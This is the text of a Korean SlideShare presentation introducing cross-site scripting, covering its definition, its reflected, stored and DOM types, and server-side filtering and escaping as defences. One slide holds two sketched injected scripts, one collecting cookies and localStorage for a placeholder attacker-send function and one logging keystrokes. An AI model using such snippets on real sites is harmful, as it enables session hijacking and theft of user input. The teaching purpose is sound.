SlideShare una empresa de Scribd logo

XSS 에 대해서 알아보자. [실습 포함]

용진 조
용진 조

xss 에 대한 발표를 한번 해 보았습니다. 뽀로로는 심심할까봐 넣어놓았습니다.

Tecnología
1 de 19
Descargar para leer sin conexión
XSS를.araboza 실습을 통해 배우는 Cross Site Scripting dydwls121200@gmail.com 조용진 XSS 어디에나 있지만. 어디에도 있으면 안된다.
1. XSS의 정의 2. XSS의 유형 3. XSS의 사례 및 실습 4. 대처방안
2. XSS의 유형 XSS가 뭘까요-?
1. XSS의 정의 사이트간 스크립팅, 크로스 사이트 스크립팅 영문 명칭 Cross-Site Scripting은 웹 애플리케이션에서 많이 나타나는 취약점의 하나로 웹 사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입 할 수 있는 취약점. (Wikipedia : 크로스사이트 스크립팅의 정의)
1. XSS의 정의
악성스크립트? http://likemilk.fun25.co.kr:15405/ 삽입 script 1 console.log(document.cookie); console.log(document); console.log(localStorage); Var hijecking = {}; hijecking.cookie = document.cookie; hijecking.document = document; hijecking.localStorage = localStorage; //알아서 코딩.. ㅎㅎ ; SendAttackerServer(hijecking); 삽입 script 2 Var input=“”; $(document).on(‘keyup’,function(event){ input+=event.key; console.log(input); input=input.replace(‘Backspace’); //등등… }); //알아서 코딩 ㅎㅎ; $(document).on(‘click’,function(event){ SendAttackerServer(input); }); 1. XSS의 정의
2. XSS의 유형 XSS 유형에 대해 알아보아요-!
Reflective XSS 공격자가 악성 스크립 트가 포함된 URL을 클 라이언트에게 노출시 켜 클릭하도록 한다. Stored XSS 데이터 베이스에 악 성 스크립트를 저장 하여 클라이언트 브 라우저에서 실행 시 키게 하는 공격 DOM XSS 클라이언트에서 수 신받은 문서를 공격 자가 의도한 문서로 조작한다. 2. XSS의 유형
Reflective XSS 2. XSS의 유형
1. 순수한 스트리밍 x동사이트인줄 알고 클릭했더니 악성 Active X가 설치됨 2. 이상한 사이트를 접속했더니 바탕화면에 바로가기가 설 치된다거나 이상한 사이트가 즐겨찾기됨 3. 유용한 유틸리티 다운받을 수 있는 URL이라 선택했는데 다운받고 나니 악성프로그램. 4. 악성 플래쉬 소스를 이용한 웹페이지를 열람하게됨. Reflective XSS 공격자가 악성 스크립트 가 포함된 URL을 클라이 언트에게 노출시켜 클릭 하도록 한다. 2. XSS의 유형
Stored XSS 2. XSS의 유형
1. 게시판에 악성 스크립트를 삽입한 글을 남기고 다른 사용 자가 해당 게시글을 읽었을 경우 악성 스크립트가 실행되게 된다. 2. 저장된 악성스크립트에 특정 돔객체의 event를 조작하는 스크립트를 삽입하여 악성스크립트를 실행하게 한다. 3. XmlHttpOpen,$.ajax, $.get, $.post 객체의 EventEmitter를 이용하여 공격자의 서버에도 피해자의 발생 데이터를 같이 받아볼 수 있도록 한다. Stored XSS 데이터 베이스에 악 성 스크립트를 저장 하여 클라이언트 브 라우저에서 실행 시 키게 하는 공격 4. 서버에서 문자열 치환 작업을 역 이용해서 스크립트를 삽 입하거나, 문자열의 인코딩을 아예 변환한 악성 스크립트를 저장하도록 한다. 2. XSS의 유형
DOM XSS 2. XSS의 유형
DOM XSS 클라이언트에서 수신 받은 문서를 공격자 가 의도한 문서로 조 작 한다. 1. 클라이언트가 읽을 수 있는 파라메터 값을 타인이 만들어 서 넣을 수 있는 기능이 있을 때 발생할 수 있다. 예: (친구의 이름:(이름에다가 악성스크립트를 넣을 때) 2. 서버에서 클라이언트에게 뿌리는 값이 다른 클라이언틀 에 의해 만들어지는 모든 입출력 데이터는 XSS 필터를 거치 고 난 후에 출력 될 수 있도록 해야한다. 2. XSS의 유형
3. XSS의 실습 실습을 해보아요-!
3. XSS의 실습 https://namu.wiki/w/XSS http://egloos.zum.com/keep/v/1030642 HTML 특수문자 인코더
4. 대처방안 막아볼까요-?
4. 대처 방안 Server-Side 에서 XSS 필터를 구현하자 외부 플러그인 및 라이브러리를 적용시킬 때 SQL Injection 및 XSS에 대한 성능을 자가진단으로 테스트해본다. 개인정보 및 운영 정보는 Client-Side에 저장 시키는것을 지양한다. [< > “ ‘ ; : ` ! @ # $ % & * | ( ) { } ] 위와 같은 문자열을 치환해서 사 용하도록 하자.
Refernces http://gudgud92.tistory.com/31 http://best421.tistory.com/63 http://cleverdj.tistory.com/51 https://namu.wiki/w/XSS http://www.kisa.or.kr/uploadfile/201312/201312161355109566.pdf

Recomendados

[2019] 게임 서버 대규모 부하 테스트와 모니터링 이렇게 해보자
[2019] 게임 서버 대규모 부하 테스트와 모니터링 이렇게 해보자[2019] 게임 서버 대규모 부하 테스트와 모니터링 이렇게 해보자
[2019] 게임 서버 대규모 부하 테스트와 모니터링 이렇게 해보자NHN FORWARD
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
 
Scala、DDD、Akkaで立ち向かう 〜広告配信システムに課せられた100msの制約〜
Scala、DDD、Akkaで立ち向かう 〜広告配信システムに課せられた100msの制約〜Scala、DDD、Akkaで立ち向かう 〜広告配信システムに課せられた100msの制約〜
Scala、DDD、Akkaで立ち向かう 〜広告配信システムに課せられた100msの制約〜MicroAd, Inc.(Engineer)
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers zakieh alizadeh
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Alcyon Ferreira de Souza Junior, MSc
 
XML と PHP のイケナイ関係 (セキュリティ的な意味で) -Introduction of XXE attack and XML Bomb with...
XML と PHP のイケナイ関係 (セキュリティ的な意味で) -Introduction of XXE attack and XML Bomb with...XML と PHP のイケナイ関係 (セキュリティ的な意味で) -Introduction of XXE attack and XML Bomb with...
XML と PHP のイケナイ関係 (セキュリティ的な意味で) -Introduction of XXE attack and XML Bomb with...Kousuke Ebihara
 
Event source 학습 내용 공유
Event source 학습 내용 공유Event source 학습 내용 공유
Event source 학습 내용 공유beom kyun choi
 

Recomendados

[2019] 게임 서버 대규모 부하 테스트와 모니터링 이렇게 해보자
[2019] 게임 서버 대규모 부하 테스트와 모니터링 이렇게 해보자[2019] 게임 서버 대규모 부하 테스트와 모니터링 이렇게 해보자
[2019] 게임 서버 대규모 부하 테스트와 모니터링 이렇게 해보자NHN FORWARD
 
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ...CODE BLUE
 
Scala、DDD、Akkaで立ち向かう 〜広告配信システムに課せられた100msの制約〜
Scala、DDD、Akkaで立ち向かう 〜広告配信システムに課せられた100msの制約〜Scala、DDD、Akkaで立ち向かう 〜広告配信システムに課せられた100msの制約〜
Scala、DDD、Akkaで立ち向かう 〜広告配信システムに課せられた100msの制約〜MicroAd, Inc.(Engineer)
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers zakieh alizadeh
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 05 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Alcyon Ferreira de Souza Junior, MSc
 
XML と PHP のイケナイ関係 (セキュリティ的な意味で) -Introduction of XXE attack and XML Bomb with...
XML と PHP のイケナイ関係 (セキュリティ的な意味で) -Introduction of XXE attack and XML Bomb with...XML と PHP のイケナイ関係 (セキュリティ的な意味で) -Introduction of XXE attack and XML Bomb with...
XML と PHP のイケナイ関係 (セキュリティ的な意味で) -Introduction of XXE attack and XML Bomb with...Kousuke Ebihara
 
Event source 학습 내용 공유
Event source 학습 내용 공유Event source 학습 내용 공유
Event source 학습 내용 공유beom kyun choi
 
CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼう
CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼうCMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼう
CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼうHiroshi Tokumaru
 
Secure Coding for Java
Secure Coding for JavaSecure Coding for Java
Secure Coding for JavaSébastien GIORIA
 
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテム
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテムSmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテム
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテムSmartNews, Inc.
 
Xss ppt
Xss pptXss ppt
Xss pptchanakyac1
 
SPAのルーティングの話
SPAのルーティングの話SPAのルーティングの話
SPAのルーティングの話ushiboy
 
Use After Free 脆弱性攻撃を試す
Use After Free 脆弱性攻撃を試すUse After Free 脆弱性攻撃を試す
Use After Free 脆弱性攻撃を試すmonochrojazz
 
Firebase Authを Nuxt + Railsの自前サービス に導入してみた
Firebase Authを Nuxt + Railsの自前サービス に導入してみたFirebase Authを Nuxt + Railsの自前サービス に導入してみた
Firebase Authを Nuxt + Railsの自前サービス に導入してみたTomoe Sawai
 
パッケージの循環参照
パッケージの循環参照パッケージの循環参照
パッケージの循環参照pospome
 
Go1.18 Genericsを試す
Go1.18 Genericsを試すGo1.18 Genericsを試す
Go1.18 Genericsを試すasuka y
 
Go言語のスライスを理解しよう
Go言語のスライスを理解しようGo言語のスライスを理解しよう
Go言語のスライスを理解しようYasutaka Kawamoto
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingRana Khalil
 
Massive service basic
Massive service basicMassive service basic
Massive service basicDaeMyung Kang
 
フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)abend_cve_9999_0001
 
Fiddler 피들러에 대해 알아보자
Fiddler 피들러에 대해 알아보자Fiddler 피들러에 대해 알아보자
Fiddler 피들러에 대해 알아보자용진 조
 
ウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説するウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説するHiroshi Tokumaru
 
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 [CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 CODE BLUE
 
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践Yoshifumi Kawai
 
プロダクトに 1 から Vue.js を導入した話
プロダクトに 1 から Vue.js を導入した話プロダクトに 1 から Vue.js を導入した話
プロダクトに 1 から Vue.js を導入した話Shohei Okada
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Alcyon Ferreira de Souza Junior, MSc
 
#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in Action#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in ActionRobin Sedlaczek
 
Drive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationDrive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationJason Choi
 

Más contenido relacionado

La actualidad más candente

CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼう
CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼうCMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼう
CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼうHiroshi Tokumaru
 
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテム
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテムSmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテム
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテムSmartNews, Inc.
 
SPAのルーティングの話
SPAのルーティングの話SPAのルーティングの話
SPAのルーティングの話ushiboy
 
Use After Free 脆弱性攻撃を試す
Use After Free 脆弱性攻撃を試すUse After Free 脆弱性攻撃を試す
Use After Free 脆弱性攻撃を試すmonochrojazz
 
Firebase Authを Nuxt + Railsの自前サービス に導入してみた
Firebase Authを Nuxt + Railsの自前サービス に導入してみたFirebase Authを Nuxt + Railsの自前サービス に導入してみた
Firebase Authを Nuxt + Railsの自前サービス に導入してみたTomoe Sawai
 
パッケージの循環参照
パッケージの循環参照パッケージの循環参照
パッケージの循環参照pospome
 
Go1.18 Genericsを試す
Go1.18 Genericsを試すGo1.18 Genericsを試す
Go1.18 Genericsを試すasuka y
 
Go言語のスライスを理解しよう
Go言語のスライスを理解しようGo言語のスライスを理解しよう
Go言語のスライスを理解しようYasutaka Kawamoto
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingRana Khalil
 
Massive service basic
Massive service basicMassive service basic
Massive service basicDaeMyung Kang
 
フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)abend_cve_9999_0001
 
Fiddler 피들러에 대해 알아보자
Fiddler 피들러에 대해 알아보자Fiddler 피들러에 대해 알아보자
Fiddler 피들러에 대해 알아보자용진 조
 
ウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説するウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説するHiroshi Tokumaru
 
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 [CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 CODE BLUE
 
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践Yoshifumi Kawai
 
プロダクトに 1 から Vue.js を導入した話
プロダクトに 1 から Vue.js を導入した話プロダクトに 1 から Vue.js を導入した話
プロダクトに 1 から Vue.js を導入した話Shohei Okada
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Alcyon Ferreira de Souza Junior, MSc
 

La actualidad más candente (20)

CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼう
CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼうCMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼう
CMS四天王への攻撃デモを通じて、WordPressの効果的な防御法を学ぼう
 
Secure Coding for Java
Secure Coding for JavaSecure Coding for Java
Secure Coding for Java
 
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテム
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテムSmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテム
SmartNews TechNight Vol5 : SmartNews AdServer 解体新書 / ポストモーテム
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
SPAのルーティングの話
SPAのルーティングの話SPAのルーティングの話
SPAのルーティングの話
 
Use After Free 脆弱性攻撃を試す
Use After Free 脆弱性攻撃を試すUse After Free 脆弱性攻撃を試す
Use After Free 脆弱性攻撃を試す
 
Firebase Authを Nuxt + Railsの自前サービス に導入してみた
Firebase Authを Nuxt + Railsの自前サービス に導入してみたFirebase Authを Nuxt + Railsの自前サービス に導入してみた
Firebase Authを Nuxt + Railsの自前サービス に導入してみた
 
パッケージの循環参照
パッケージの循環参照パッケージの循環参照
パッケージの循環参照
 
Go1.18 Genericsを試す
Go1.18 Genericsを試すGo1.18 Genericsを試す
Go1.18 Genericsを試す
 
Go言語のスライスを理解しよう
Go言語のスライスを理解しようGo言語のスライスを理解しよう
Go言語のスライスを理解しよう
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Massive service basic
Massive service basicMassive service basic
Massive service basic
 
フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)フリーでできるWebセキュリティ(burp編)
フリーでできるWebセキュリティ(burp編)
 
Fiddler 피들러에 대해 알아보자
Fiddler 피들러에 대해 알아보자Fiddler 피들러에 대해 알아보자
Fiddler 피들러에 대해 알아보자
 
ウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説するウェブセキュリティのありがちな誤解を解説する
ウェブセキュリティのありがちな誤解を解説する
 
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼 [CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
[CB19] アンチウイルスをオラクルとしたWindows Defenderに対する新しい攻撃手法 by 市川遼
 
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践
AWS + Windows(C#)で構築する.NET最先端技術によるハイパフォーマンスウェブアプリケーション開発実践
 
プロダクトに 1 から Vue.js を導入した話
プロダクトに 1 から Vue.js を導入した話プロダクトに 1 から Vue.js を導入した話
プロダクトに 1 から Vue.js を導入した話
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
 
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
Aula 04 - Curso GRATUITO EAD de Desenvolvimento Seguro de Software com Alcyon...
 

Destacado

#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in Action#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in ActionRobin Sedlaczek
 
Drive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationDrive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationJason Choi
 
(FICON2015) #3 어떻게 들어왔는가?
(FICON2015) #3 어떻게 들어왔는가?(FICON2015) #3 어떻게 들어왔는가?
(FICON2015) #3 어떻게 들어왔는가?plainbit
 
Drive by downloads-cns
Drive by downloads-cnsDrive by downloads-cns
Drive by downloads-cnsmmubashirkhan
 
(FICON2015) #4 어떻게 가져갔는가?
(FICON2015) #4 어떻게 가져갔는가?(FICON2015) #4 어떻게 가져갔는가?
(FICON2015) #4 어떻게 가져갔는가?plainbit
 
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!INSIGHT FORENSIC
 
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전James (SeokHun) Hwang
 
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토plainbit
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Youngjun Chang
 
(FICON2015) #1 어떻게 대응할 것인가?
(FICON2015) #1 어떻게 대응할 것인가?(FICON2015) #1 어떻게 대응할 것인가?
(FICON2015) #1 어떻게 대응할 것인가?plainbit
 
(FICON2015) #2 어떻게 조사할 것인가?
(FICON2015) #2 어떻게 조사할 것인가?(FICON2015) #2 어떻게 조사할 것인가?
(FICON2015) #2 어떻게 조사할 것인가?plainbit
 
시스템 보안에 대해 최종본
시스템 보안에 대해 최종본시스템 보안에 대해 최종본
시스템 보안에 대해 최종본승표 홍
 
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic용진 조
 
how to use fiddler (Ver eng)
how to use fiddler (Ver eng)how to use fiddler (Ver eng)
how to use fiddler (Ver eng)용진 조
 

Destacado (18)

#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in Action#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in Action
 
Drive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationDrive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript Obfuscation
 
(FICON2015) #3 어떻게 들어왔는가?
(FICON2015) #3 어떻게 들어왔는가?(FICON2015) #3 어떻게 들어왔는가?
(FICON2015) #3 어떻게 들어왔는가?
 
Drive by downloads-cns
Drive by downloads-cnsDrive by downloads-cns
Drive by downloads-cns
 
(FICON2015) #4 어떻게 가져갔는가?
(FICON2015) #4 어떻게 가져갔는가?(FICON2015) #4 어떻게 가져갔는가?
(FICON2015) #4 어떻게 가져갔는가?
 
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!
 
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전
 
02.모의해킹전문가되기
02.모의해킹전문가되기02.모의해킹전문가되기
02.모의해킹전문가되기
 
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안
 
(FICON2015) #1 어떻게 대응할 것인가?
(FICON2015) #1 어떻게 대응할 것인가?(FICON2015) #1 어떻게 대응할 것인가?
(FICON2015) #1 어떻게 대응할 것인가?
 
(FICON2015) #2 어떻게 조사할 것인가?
(FICON2015) #2 어떻게 조사할 것인가?(FICON2015) #2 어떻게 조사할 것인가?
(FICON2015) #2 어떻게 조사할 것인가?
 
시스템 보안에 대해 최종본
시스템 보안에 대해 최종본시스템 보안에 대해 최종본
시스템 보안에 대해 최종본
 
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic
 
APT Case Study
APT Case StudyAPT Case Study
APT Case Study
 
how to use fiddler (Ver eng)
how to use fiddler (Ver eng)how to use fiddler (Ver eng)
how to use fiddler (Ver eng)
 
Build Features, Not Apps
Build Features, Not AppsBuild Features, Not Apps
Build Features, Not Apps
 

Similar a XSS 에 대해서 알아보자. [실습 포함]

XSS(Cross site scripting) - Kitworks Team Study
XSS(Cross site scripting) - Kitworks Team StudyXSS(Cross site scripting) - Kitworks Team Study
XSS(Cross site scripting) - Kitworks Team StudyWonjun Hwang
 
Web vulnerability seminar3
Web vulnerability seminar3Web vulnerability seminar3
Web vulnerability seminar3Sakuya Izayoi
 
컴퓨터보안.pptx
컴퓨터보안.pptx컴퓨터보안.pptx
컴퓨터보안.pptxdalonn
 
랜섬웨어 엔딩 #2016 1Q
랜섬웨어 엔딩 #2016 1Q랜섬웨어 엔딩 #2016 1Q
랜섬웨어 엔딩 #2016 1QNSHC-RedAlert
 
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹NAVER D2
 
Springcamp 2015 - xss는 네가 맡아라
Springcamp 2015 - xss는 네가 맡아라Springcamp 2015 - xss는 네가 맡아라
Springcamp 2015 - xss는 네가 맡아라Hyeong-Kyu Lee
 
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규ChangKyu Song
 
Web framework security
Web framework securityWeb framework security
Web framework securityNewHeart
 
Web framework security
Web framework securityWeb framework security
Web framework securitypknhacker
 
5-5. html5 connectivity
5-5. html5 connectivity5-5. html5 connectivity
5-5. html5 connectivityJinKyoungHeo
 

Similar a XSS 에 대해서 알아보자. [실습 포함] (11)

XSS(Cross site scripting) - Kitworks Team Study
XSS(Cross site scripting) - Kitworks Team StudyXSS(Cross site scripting) - Kitworks Team Study
XSS(Cross site scripting) - Kitworks Team Study
 
Web vulnerability seminar3
Web vulnerability seminar3Web vulnerability seminar3
Web vulnerability seminar3
 
컴퓨터보안.pptx
컴퓨터보안.pptx컴퓨터보안.pptx
컴퓨터보안.pptx
 
랜섬웨어 엔딩 #2016 1Q
랜섬웨어 엔딩 #2016 1Q랜섬웨어 엔딩 #2016 1Q
랜섬웨어 엔딩 #2016 1Q
 
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹
 
Web hacking 개요
Web hacking 개요Web hacking 개요
Web hacking 개요
 
Springcamp 2015 - xss는 네가 맡아라
